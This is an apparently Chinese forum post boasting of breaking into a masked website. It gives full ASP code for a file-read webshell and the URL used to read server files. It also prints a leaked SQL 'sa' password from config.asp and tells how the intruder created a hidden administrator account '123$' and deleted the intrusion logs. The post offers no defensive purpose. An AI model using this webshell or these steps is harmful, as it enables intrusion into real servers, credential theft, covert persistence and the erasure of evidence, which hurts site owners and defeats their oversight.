黑客是如何突破一流检测系统的
攻击目标:www.***.com<br />测试过的动作,一句话马,加密马,等。<br />
测试结果:无效,无法上传,无法进入系统。<br />
经过2天的分析,<br />
然后自己搞出了一个代码,利用此代码读取了该网站下的config.asp文件源代码
-------------------------------------------------------------------------
<%<br />
file=Request("file")<br />
Set FSOOBJ=Server.CreateObject("Scripting.FileSystemObject")<br />
if FSOOBJ.fileExists(file) then<br />
Set myfile=FSOOBJ.opentextfile(file,1)<br />
Response.write "<pre>" & server.HTMLEncode(myfile.readall) &"</pre>"<br />
myfile.close<br />
Set myfile=nothing<br />
else<br />
Response.write "file(" & file & ") not exists."<br />
end if<br />
%><br />
-------------------------------------------------------------------------
http://www.***.com/view.asp?file=D:\wwwroot\index.asp
读取到的敏感内容<br />
sql地址:***.***.***.***<br />
帐号:sa 密码:u8f2444f
利用此帐号进入后,建立了123$的隐藏管理员用户,删除入侵日志后退出。
<br />
頁:
[1]